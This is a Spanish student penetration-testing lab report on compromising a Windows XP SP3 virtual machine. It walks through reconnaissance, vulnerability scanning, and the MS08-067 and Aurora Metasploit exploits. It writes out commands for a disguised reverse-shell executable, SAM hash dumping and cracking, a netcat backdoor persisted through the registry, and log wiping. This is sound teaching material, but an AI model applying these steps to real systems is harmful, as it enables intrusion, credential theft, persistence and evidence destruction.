Upload
howard-martinez
View
286
Download
0
Embed Size (px)
Citation preview
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 1/27
PenTesting Windows XP SP3
A través de este informe de pentesting detallaremos cada una de las fases de la metodología
de ethical hacking llevadas a cabo por el grupo para lograr la penetración de una máquina
Windows XP SP3
López Pineda Greys Paola – Martínez Meza Howard Andrés – Ojeda de la Hoz José Carlo
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 2/27
Contenido
Marco Teórico ............................................................................................................................... 2
Fase 1 – Reconocimiento (Reconnaissance) ............................................................................. 2
Fase 2 – Escaneo (Scanning) ...................................................................................................... 2
Fase 3 – Ganar Acceso (Gaining Access) ................................................................................... 3
Fase 4 – Mantener el Acceso (Maintaining Access) .................................................................. 3
Fase 5 – Cubrir las huellas (Covering Tracks) ............................................................................ 3
PenTesting Windows XP SP3 ......................................................................................................... 5
1. Fase de Reconocimiento ................................................................................................... 6
2. Fase de escaneo .............................................................................................................. 10
2.1 Escaneo de Puertos .................................................................................................. 10
2.2 Escaneo de Vulnerabilidades................................................................................... 11
3. Fase de Ganando Acceso/Explotación ............................................................................ 16
3.1 Penetración # 1 ....................................................................................................... 17
3.2 Penetración # 2 ....................................................................................................... 19
3.3 Penetración # 3 ....................................................................................................... 22
4. Fase Mantener Acceso .................................................................................................... 25
5. Fase Cubrir Huellas .......................................................................................................... 26
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 3/27
Marco Teórico
De ante mano la palabra de PenTesting que en sentido completo seria Penetration
Test, hace referencia al método de evaluación de la seguridad de un sistema
computacional o red a través de ataques de fuente maliciosa.
Cada ataque sigue una metodología establecida la cual se divide en fases, las cuales
son1:
Fase 1 – Reconocimiento (Reconnaissance)
El reconocimiento se refiere a la fase preparatoria donde el atacante obtiene toda la
información necesaria de su objetivo o víctima antes de lanzar el ataque. Esta fase
también puede incluir el escaneo de la red que el Hacker quiere atacar no importa si el
ataque va a ser interno o externo. Esta fase le permite al atacante crear una estrategia
para su ataque.
Esta fase puede incluir la Ingeniería Social, buscar en la basura (Dumpster diving),
buscar que tipo de sistema operativo y aplicaciones usa el objetivo o víctima, cuales
son los puertos que están abiertos, donde están localizados los routers (enrutadores),
cuales son los host (terminales, computadoras) más accesibles, buscar en las bases de
datos del Internet (Whois) información como direcciones de Internet (IP), nombres de
dominios, información de contacto, servidores de email y toda la información que se
pueda extraer de los DNS (Domain Name Server).
Esta fase le puede tomar bastante tiempo al Hacker ya que tiene que analizar toda la
información que ha obtenido para lanzar el ataque con mayor precisión.
Fase 2 – Escaneo (Scanning)
Esta es la fase que el atacante realiza antes de la lanzar un ataque a la red (network).
En el escaneo el atacante utiliza toda la información que obtuvo en la Fase del
Reconocimiento (Fase 1) para identificar vulnerabilidades específicas. Por ejemplo, si
en la Fase 1 el atacante descubrió que su objetivo o su víctima usa el sistema operativo
Windows XP entonces el buscara vulnerabilidades específicas que tenga ese sistema
operativo para saber por dónde atacarlo.
También hace un escaneo de puertos para ver cuáles son los puertos abiertos para
saber por cual puerto va entrar y usa herramientas automatizadas para escanear la red
y los host en busca de más vulnerabilidades que le permitan el acceso al sistema.
1WISE DATE SECURITY - Las 5 fases de ataque de un Hacker: Anatomía de un ataque. Disponible Online:
[http://www.wisedatasecurity.com/5-fases-ataque-hacker.html] Consultado: 28/08/11.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 4/27
Fase 3 – Ganar Acceso (Gaining Access)
Esta es una de las fases más importantes para el Hacker porque es la fase de
penetración al sistema, en esta fase el Hacker explota las vulnerabilidades que
encontró en la fase 2. La explotación puede ocurrir localmente, offline (sin estar
conectado), sobre el LAN (Local Area Network), o sobre el Internet y puede incluirtécnicas como buffer overflows (desbordamiento del buffer), denial-of-service
(negación de servicios), sesión hijacking (secuestro de sesión), y password cracking
(romper o adivinar claves usando varios métodos como: diccionary atack y brute forcé
atack).
Los factores que ayudan al Hacker en esta fase a tener una penetración exitosa al
sistema dependen de cómo es la arquitectura del sistema y de cómo está configurado
el sistema objetivo o víctima, una configuración de seguridad simple significa un
acceso más fácil al sistema, otro factor a tener en cuenta es el nivel de destrezas,habilidades y conocimientos sobre seguridad informática y redes que tenga el Hacker y
el nivel de acceso que obtuvo al principio de la penetración (Fase 3).
Fase 4 – Mantener el Acceso (Maintaining Access)
Una vez el Hacker gana acceso al sistema objetivo (Fase3) su prioridad es mantener el
acceso que gano en el sistema. En esta fase el Hacker usa sus recursos y recursos del
sistema y usa el sistema objetivo como plataforma de lanzamiento de ataques para
escanear y explotar a otros sistemas que quiere atacar, también usa programasllamados sniffers para capturar todo el tráfico de la red, incluyendo sesiones de telnet
y FTP (File Transfer Protocol).
En esta fase el Hacker puede tener la habilidad de subir, bajar y alterar programas y
data. En esta fase el hacker quiere permanecer indetectable y para eso remueve
evidencia de su penetración al sistema y hace uso de Backdoor (puertas traseras) y
Troyanos para ganar acceso en otra ocasión y tratar de tener acceso a cuentas de altos
privilegios como cuentas de Administrador. También usan los caballos de Troya
(Trojans) para transferir nombres de usuarios, passwords e incluso información detarjetas de crédito almacenada en el sistema.
Fase 5 – Cubrir las huellas (Covering Tracks)
En esta fase es donde el Hacker trata de destruir toda la evidencia de sus actividades
ilícitas y lo hace por varias razones entre ellas seguir manteniendo el acceso al sistema
comprometido ya que si borra sus huellas los administradores de redes no tendrán
pistas claras del atacante y el Hacker podrá seguir penetrando el sistema cuando
quiera, además borrando sus huellas evita ser detectado y ser atrapado por la policía o
los Federales.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 5/27
Las herramientas y técnicas que usa para esto son caballos de Troya, Steganography,
Tunneling, Rootkits y la alteración de los “log files” (Archivos donde se almacenan
todos los eventos ocurridos en un sistema informático y permite obtener información
detallada sobre los hábitos de los usuarios), una vez que el Hacker logra plantar
caballos de Troya en el sistema este asume que tiene control total del sistema.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 6/27
PenTesting Windows XP SP3
Para este laboratorio de PenTesting utilizaremos el entorno VMware Workstation en el
que portaremos las máquinas, tanto la máquina atacante (Back Track) como la
máquina víctima, en este caso nuestro objetivo de prueba es una máquina Windows
XP Profesional SP3, la cual es una máquina de tipo cliente.
Fig 1. Máquina Atacante
Fig 2. Máquina Victima
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 7/27
1. Fase de Reconocimiento
Recogeremos toda la información de nuestra víctima que nos pueda ayudar a través
del resto de las fases sucesivas como son las direcciones IP, usuarios que posee la
máquina, certeza del tipo de sistema operativo que tiene.
Estando en nuestro entorno de trabajo hacemos primeramente un reconocimiento
propio para conocer nuestra dirección IP y la red en la que nos encontramos, digitamos
entonces ifconfig, luego realizamos escaneo de la red para llegar a determinar cuál es
la dirección IP de la víctima. Para ello hacemos uso del nmap y digitamos nmap -sP
192.168.1.*
Fig 3. Identificación de nuestra dirección IP
Fig 4. Escaneo de Red para identificar Hosts activos
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 8/27
Como vemos, hay 3 host activos en la red que tienen dirección IP: 192.168.1.1,
192.168.1.8 y 192.168.1.10 como de antemano sabemos que es una máquina
Windows procedemos a buscar una marca que nos lo identifique, para ello hacemos
ping a las maquinas para buscar una marca en la ttl que nos indique que sea una
máquina Windows, sabemos que la ttl para maquinas Windows es ttl=128.Descartamos la dirección IP 192.168.1.10 la cual sabemos que es de nuestra máquina
de Back Track.
Fig 5. Haciendo Ping a los hosts de la red para identificar las ttl
Como vemos la máquina que identifica a un equipo Windows dentro de nuestra red
configurada es la que tiene dirección IP 192.168.1.8
Ahora proseguiremos a hacer pruebas para determinar con más detalle el tipo de
sistema operativo que corre sobre la víctima. Utilizaremos comandos diferentes para
determinarlo y comparar respuestas.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 9/27
Usando: nmap -sV -O 192.168.1.8
Fig 6. Identificando SO de la víctima mediante nmap -sV -O 192.168.1.8
Usando: namp -sV -O2 192.168.1.8
Fig 7. Identificando SO de la víctima mediante nmap -sV -O2 192.168.1.8
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 10/27
Como vemos las respuestas arrojadas nos dan la certeza de que se trata una maquina
Windows y las versiones que tienen más probabilidad de ocurrencia en el resultado
atinan a un Windows XP con SP3.
Lo siguiente que haremos para seguir en nuestra búsqueda de información es
averiguar los usuarios que tiene la maquina, para ello hacemos uso del Nmap Scripting
Engine (NSE) esta es una potente funcionalidad del Nmap que permite la ejecución de
scripts, que además permite que los usuarios puedan escribir y compartir scripts para
realizar multitud de tareas. Las tareas que se pueden realizar con el NSE se agrupan en:
descubrimiento de red, detección de versiones de servicios mejorada, detección de
vulnerabilidades, detección de gusanos y backdoors, explotación de vulnerabilidades.
Para nuestro cometido de sacar los usuarios de nuestra maquina victima primero
debemos estar en la ruta donde se almacenan los scripts, en la versión de Backtrack 5
esa ruta se logra digitando cd ../usr/local/share/nmap/scripts
Fig 8. En la ruta de los scripts del NSE
Estando allí en la ruta podemos hacer uso del script con el que conoceremos los
usuarios de la maquina víctima, digitamos entonces: nmap –sV --script smb-enum-
users 192.168.1.8 –p 445
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 11/27
Fig 9. Examinación de Usuarios en la máquina victima
Como podemos notar hay cuatro usuarios en la maquina víctima: Administrator, Guest,
HelpAssistant, Student y SUPPORT_388945a0 dos de los cuales tienen RID de 5XX lo
que indica que estos poseen privilegios administrativos.
En este punto podemos decir que tenemos información útil referente a nuestra
víctima, nos preparamos para ir avanzando a la siguiente fase.
2. Fase de escaneo
Esta fase incluye unas subdivisiones que corresponden a escaneo de puertos y
servicios, y escaneo de vulnerabilidades.
2.1 Escaneo de Puertos
Para esta tarea podemos valernos de la herramienta nmap para hacer diversos tipos
de escaneo, o si bien deseamos podemos utilizar la herramienta de tipo graficollamada Zenmap, que utiliza como base nmap. Haremos un escaneo de tipo agresivo
para determinar que puertos están abiertos, que servicios están corriendo sobre esos
puertos y que versiones de esos servicios se presentan.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 12/27
Fig 10. Escaneo de Puertos y Servicios
Como podemos observar tenemos dos puertos activos en la máquina, el 139 y el 445,sobre el primero está corriendo el servicio de netbios-ssny sobre el 445 el servicio
Microsoft-ds, si algo podemos notar es que sobre ambos puertos actúa el protocolo
SMB que en sentido completo es “Server Messages Block” de lo cual nos podemos
valer para identificar en el paso siguiente posibles vulnerabilidades.
2.2 Escaneo de Vulnerabilidades
Para esta labor realizamos tres procesos. Los dos primeros fueron automatizados y
equivalentes; el primer escaneo fue a través de nmap y apoyándonos con el autopwn,
el segundo escaneo que fue equivalente al primero fue a través de OpenVAS e
igualmente apoyándonos con autopwn y el último proceso lo realizamos a través de
del Nmap Scripting Engine.
Para el escaneo automatizado a través de Nmap necesitamos inicialmente crear una
base de datos, en nuestro caso utilizamos una base de datos con el nombre de
metasploit en el motor de PostgreSQL, luego necesitamos conectarnos a esa base de
datos, posteriormente necesitamos guardar el escaneo realizado con el nmap, en
ultimas, aplicamos el autopwn sobre los datos guardados y este según los parámetros
ingresados nos mostrara los exploits que vulneran esos puertos abiertos en la victima yprobara cada uno mediante una conexión en reversa para otorgarnos al finalizar el
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 13/27
proceso, en caso satisfactorio, cierto número de sesiones de meterpreter. Esto lo
presentamos a continuación:
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 14/27
Fig 11. Escaneo de Vulnerabilidades con Nmap y autopwn
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 15/27
Como pudimos observar, este proceso automatizado nos ha arrojado como resultado
concreto, una vulnerabilidad luego de haber intentado con 101 módulos posibles, la
vulnerabilidad encontrada es bien conocida gracias a los boletines de Microsoft, se
trata de la ms08_067_netapi, la cual se vale de una falla de análisis en el código del
camino de netapi32.dll a través del servicio de servidor para luego darnos acceso.Tenemos dos sesiones activas, podríamos interactuar con ellas y acceder de manera
inmediata a la máquina, pero ese paso quedara presentado en la próxima fase de
ganando acceso, o también conocida como explotación.
El segundo proceso automatizado es muy similar al que acabamos de describir, las
variantes han sido que: en vez de utilizar un escaneo desde el nmap, lo hemos hecho a
través de OpenVAS, el cual nos ha arrojado un reporte completo, este reporte será el
que guardaremos en una base de datos de nombre winxp para luego aplicar de igual
manera el autopwn como veremos a continuación:
Fig 12. Conectando a la base de datos winxp e importando el archivo OpenVAS.nbe
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 16/27
Fig 13. Escaneo de vulnerabilidades con OpenVAS y autopwn
Como pudimos observar el resultado presentado esta vez nos arrojó 3 sesiones con las
que podemos interactuar directamente, y se refleja claramente el número de módulos
que nos trajo como posibles vulnerabilidades, esto se debe a que el escaneo realizado
por el OpenVAS va más allá de hallar vulnerabilidades por la simple igualación de
puertos sino que también consulta información externa.
El tercer proceso que realizamos para también identificar vulnerabilidades de la
víctima valiéndonos de las herramientas de nuestra maquina atacante fue la utilización
de un script de la librería de scripts del NSE, en este caso utilizamos el smb-check-
vulns, como vemos a continuación:
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 17/27
Fig 14. Escaneo de vulnerabilidades a través de NSE
Aquí también nos arrojó ciertas vulnerabilidades del sistema pero fijémonos que
algunas están deshabilitadas y que se sigue resaltando la vulnerabilidad de MS08_067.
En este punto podemos decir que los tres procesos nos dan como balance la
penetración del sistema pero solo gracias a la vulnerabilidad MS08_067, esto basado
primordialmente en igualación de los puertos abiertos y en los módulos que están en
la base de datos del metasploit. Para seguir con nuestra labor y pasar a la siguiente
fase, optaremos por tomar la consideración que nuestra maquina víctima es una
maquina Cliente y que luego de una obtención de claves y revisión de los aplicativos de
la maquina podemos lanzar ataques Client-Side.
3. Fase de Ganando Acceso/Explotación
Luego de tener identificada ciertas vulnerabilidades de la maquina victima procedemos
a ganar acceso a ella a través de lanzamiento de exploits que exploten dichas
vulnerabilidades.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 18/27
3.1 Penetración # 1
Para esta penetración nos valdremos de la vulnerabilidad identificada en todos los
escaneos de vulnerabilidades que realizamos, se trata de la ms08_067_netapi que
como habíamos dicho se vale de una falla de análisis en el código del camino de
netapi32.dll a través del servicio de servidor para luego darnos acceso. Para ello
proseguimos como sigue:
Fig 15. Configuración del exploit ms08_067_netapi
Como vemos tenemos que cargar el exploit mediante el comando useWindows/smb/ms08_067_netapi luego configuramos el payload asociado que le
vamos a cargar, en nuestro caso probamos con un payload de meterpreter y de modo
reverse para curarnos en salud y que la penetración sea exitosa aun cuando en la
maquina victima haya un firewall. Posteriormente configuramos las direcciones del
host local y la del host remoto, en final de cuentas mostramos las opciones en pantalla
para ver cómo va la configuración, cuando todo esté listo podemos proseguir a lanzar
el exploit digitando exploit.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 19/27
Fig 16. Logrando el acceso a la maquina a través del exploit ms08_067_netapi
Ya estando dentro de la maquina lo que podemos hacer depende de nuestra
imaginación. Examinando algunas que otras cosas podemos identificar el id del usuario
con que estamos en la máquina, podemos mirar en que directorio estamos y algo que
resulta interesante, hacer un dump del archivo SAM, este archivo guarda los hashes de
los usuarios de la máquina.
Luego de tener estos hashes los llevamos a una aplicación que nos ayude a
desencriptarlas, a Ophcrack por ejemplo, con esto lograremos tener en nuestro poderlas claves reales de estos usuarios. Ophcrack trabaja sobre tablas rainbow en algunos
casos necesitaremos obtener estas tablas para obtener resultados satisfactorios en el
desencriptamiento.
Fig 17. Utilización de Ophcrack para desencriptamiento de los hashes
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 20/27
Luego de someter los hashes a este proceso y utilizando una tabla rainbow
xp_small_free logramos obtener las claves de los usuarios: Administrator y Student, las
cuales son en su orden P455w0rd y L34rn1ng.
3.2 Penetración # 2
Con esta penetración al igual que la anterior, ganaremos control sobre la máquina,
pero esta vez nos vamos a valer del precepto de que nuestra víctima es una maquina
cliente, por ende podemos vulnerar aquellas aplicaciones que el cliente de la maquina
utiliza. Buscando referencias de las aplicaciones de las maquinas nos topamos que
tenía instalado un Explorador: Internet Explorer versión 6, esta versión del internet
Explorer es vulnerable al exploit conocido como Aurora, por ello, en esta penetración
nos basaremos en un ataque Client-Side para llevar a final termino nuestro cometido.
Primeramente cargamos el exploit digitando
use exploit/Windows/browser/ms10_002_aurora
Luego le cargamos el payload respectivo, en nuestro caso le cargaremos un
windows/meterpreter/reverse_tcp, seguido a esto configuramos la dirección del local
host con 192.168.1.3 y el Uripath lo configuramos como /. Así como se muestra:
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 21/27
Fig 18. Configurando el exploit ms10_002_aurora
Luego que tenemos todo configurado, procedemos a explotar, el resultado arrojado es
referente a que un servidor se ha iniciado en nuestra dirección local, esa dirección IP
debemos lograr que sea accedida por un usuario en la maquina víctima, una vez
logrado esto, el código malicioso nos otorgara una sesión, con lo cual lograremos
nuestro cometido.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 22/27
Fig 19. Ganando Acceso a través de la vulnerabilidad Aurora mediante un ataque Client-Side
Como vemos, hemos logrado penetrar en la máquina de una segunda manera.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 23/27
3.3 Penetración # 3
En esta tercera penetración también nos valemos de técnicas de explotación Client-
Side, sabemos que nuestra víctima es una maquina Windows y que es vulnerable con
los ejecutables, los famosos .exe podemos hacer un .exe caracterizado el cual este
configurado con los parámetros que le indiquemos para realizar una acción
programada por nosotros para ganar acceso en la máquina, luego de tener el .exe
como tal, lo podemos maquillar, poner iconos, ponerle un nombre atractivo pero en
esencia cumplirá la misma labor. En definitiva, crearemos un .exe el cual le haremos
llegar a la maquina victima a través de un correo, una memoria usb, de la manera que
queramos, cuando el usuario que actúa sobre la maquina victima lo abra el código
malicioso se ejecutara para darle paso a las acciones que programamos y otorgarnos
una sesión en la máquina. Todo el proceso se ilustra a continuación:
Primero digitamos msfpayload Windows/meterpreter/reverse_tcp lhost=192.168.1.3
lport=4444 X > /root/Desktop/Interesante.exe con esto logramos crear un ejecutable
en el escritorio que tiene por nombre Interesante.exe y el cual va a poseer un payload
de conexión reverse a través de meterpreter al socket 192.168.1.3:4444.
Fig 20. Creando .exe configurado
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 24/27
Luego de crear el .exe vamos ahora a hacer uso del exploit handler que va a estar
configurado de la misma manera, con el mismo payload pero este estará a la espera de
esa comunicación.
Para lograr hacer uso del handler, digitamos msfcli exploit/multi/handler
payload=Windows/meterpreter/reverse_tcp lhost=192.168.1.3 lport=4444 E
Fig 21. Haciendo uso del exploit handler a la espera
Aquí podemos notar ya que el exploit handler está a la espera, ahora el paso siguientes
es enviarle, regalarle, darle, etc, el archivo Interesante.exe a un usuario de nuestra
maquina víctima.
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 25/27
Fig 22. Pasándole el .exe configurado a la victima
Después de que le hemos pasado el .exe y este lo ejecuta podemos ver que es lo que
pasa en nuestra maquina atacante.
Fig 23. Logrando el cometido
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 26/27
Una vez más hemos logrado nuestro cometido y nos hemos hecho con una sesión
dentro de la víctima.
4. Fase Mantener Acceso
Así como cada fase depende de la anterior, esta está íntimamente ligada a la de la
explotación, el fin como tal de mantener acceso es en concepto de que no tengamos
que volver a realizar todo el proceso de explotación sino que por ejemplo creemos una
puerta trasera, que sin un esfuerzo adicional podamos tener acceso a la víctima luego
de haberla penetrado.
Para esta fase crearemos un Back Door valiéndonos de alguna de las penetraciones
anteriores, el proceso de creación de un Back Door puede también realizarse de
diversas maneras, en esta instancia crearemos un Back Door estable y lo realizaremos
a través de una sesión de meterpreter ya obtenida. Para ello seguimos los pasos
siguientes:
Subimos a nuestra maquina victima el Netcat para instalarlo y ejecutarlo en la maquina
como un servidor a la escucha en un puerto especifico, en nuestro caso le colocaremos
en el 445 y ejecutándose como demonio, es decir de manera oculta.
Luego de ejecutarlo, agregamos el programa al registro de Windows para que cada vez
que se inicie la maquina nuestro proceso inicie con ella. Todo lo vemos a continuación:
Fig 24. Subiendo NetCat a la maquina víctima, ejecutándolo y agregándolo al registro de Windows
Ahora solo basta con salir de la sesión de meterpreter, cargar el exploit de
exploit/multi/handler , configurarlo con un payload window/shell_bind_tcp y luego
5/11/2018 Pen Testing - slidepdf.com
http://slidepdf.com/reader/full/pen-testing 27/27
configurar el puerto local por el que hemos configurado anteriormente, en este caso
será el puerto 445.
Fig 25. Conectándose a la maquina victima a través del Back Door
Con esto tenemos listo nuestra puerta trasera para mantener el acceso a la víctima.
5. Fase Cubrir Huellas
En esta fase lo que hacemos es borrar el rastro que hemos dejado luego de la
penetración a la máquina, si estamos en una sesión de meterpreter resulta sencillo,
con un simple comando podemos borrar el compilado de logs, como se muestra:
Fig 26. Borrando Huellas de la maquina victima